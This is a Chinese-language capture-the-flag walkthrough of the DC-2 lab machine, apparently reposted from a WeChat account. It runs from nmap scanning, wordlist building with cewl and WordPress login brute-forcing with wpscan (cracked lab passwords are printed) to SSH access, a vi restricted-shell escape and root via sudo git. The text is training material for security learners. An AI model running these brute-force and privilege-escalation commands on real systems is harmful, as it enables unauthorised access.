DC-2靶场实战 - DC靶场实战系列(一)

admin 2024年8月2日23:16:55评论16 views字数 1412阅读4分42秒阅读模式

声明:本文来自冰尘师傅的投稿,DC-2靶场实战 为 DC靶场实战系列第一篇,感谢冰尘师傅的投稿!


一、环境部署

  • 虚拟环境:vmware

  • 网络:NAT部署

  • 攻击端:kali

  • 靶机:DC-2

二、信息收集

1.IP扫描

nmap -sP 192.168.117.0/24

扫到目标IP:

    192.168.117.152

DC-2靶场实战 - DC靶场实战系列(一)

2.端口扫描

nmap -sS 192.168.117.152 -p 1-65535

扫到目标端口:

    80 http7744

DC-2靶场实战 - DC靶场实战系列(一)

服务识别:
telnet 192.168.117.152 7744

判断服务:

    7744 ssh

DC-2靶场实战 - DC靶场实战系列(一)

3.深度挖掘

访问80端口:
http://192.168.117.152

被重定向到:

    http://dc-2

DC-2靶场实战 - DC靶场实战系列(一)

修改hosts文件:
vim /etc/hosts

  • 添加下面内容

  • 注意中间不是空格是Tab
192.168.117.152  dc-2

DC-2靶场实战 - DC靶场实战系列(一)


三、渗透测试

1.再次访问80,flag1
http://dc-2

找到flag1:

    提示使用 cewl 命令

DC-2靶场实战 - DC靶场实战系列(一)

2.构建密码字典

cewl http://dc-2 > passwd.txt



cewl http://dc-2 -o passwd.txt

注意,这里要用http://dc-2 ,不能使用http://192.168.117.152
获取到:

    字典passwd.txt

DC-2靶场实战 - DC靶场实战系列(一)

3.目录扫描
dirsearch -u http://dc-2

扫到登录页面:

    http://dc-2/wp-login.php发现是wps框架

DC-2靶场实战 - DC靶场实战系列(一)

4.账号爆破
此时我们有了:

    登录页密码本wps框架
此时需要找一个账号集,才能进行登录爆破。
wpscan --url http://dc-2 -e u

找到账号:

    adminjerrytom

DC-2靶场实战 - DC靶场实战系列(一)

5.制作账号本
echo "name" > user.txtecho "jerry" >> user.txtecho "tom" >> user.txt

得到账号本:

    user.txt

DC-2靶场实战 - DC靶场实战系列(一)

6.登录爆破
wpscan --url http://dc-2/ -U user.txt -P passwd.txt

得到两个账号密码:

    jerry/adipiscingtom/parturient

DC-2靶场实战 - DC靶场实战系列(一)

7.登录,信息收集,flag2
登录http网站,获取flag2。
    这里什么也没有,换个地方看看

DC-2靶场实战 - DC靶场实战系列(一)


四、权限提升

1.尝试ssh连接
ssh tom@dc-2 -p 7744

成功登录tom账号。

DC-2靶场实战 - DC靶场实战系列(一)

2.查看权限
lscat flag3.txtcompgen -c

查看文件发现flag3.txt,但cat没命令,查看可执行命令:

    viless

DC-2靶场实战 - DC靶场实战系列(一)

3.获取flag3
vi flag3.txt

得到提示:

    下一步获取jerry权限

DC-2靶场实战 - DC靶场实战系列(一)

4.提升权限
使用vi编辑器打开任意文件,使用vi编辑器命令:
  :set shell=/bin/sh  :shell

得到普通sh的shell:

DC-2靶场实战 - DC靶场实战系列(一)

5.得到flag4
cd ../jerrylsvi flag4.txt

得到提示:

    已经没有提示了,需要靠自己得到final flag

DC-2靶场实战 - DC靶场实战系列(一)

6.登录jerry
发现/bin/su可以执行,使用:
/bin/su jerryadipiscing

得到:

    jerry shell

DC-2靶场实战 - DC靶场实战系列(一)

7.尝试sudo提权
sudo -l

得到:

    /usr/bin/git

DC-2靶场实战 - DC靶场实战系列(一)

8.git提权
发现sudo可以免密提升root权限的git命令:
sudo git help config!/bin/bashwhoami

得到:

    root shell

DC-2靶场实战 - DC靶场实战系列(一)

9.获取final-flag.txt
cd ~lscat final-flag.txt

DC-2靶场实战 - DC靶场实战系列(一)

原文始发于微信公众号(安诺信安):DC-2靶场实战 - DC靶场实战系列(一)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月2日23:16:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DC-2靶场实战 - DC靶场实战系列(一)https://cn-sec.com/archives/3027890.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息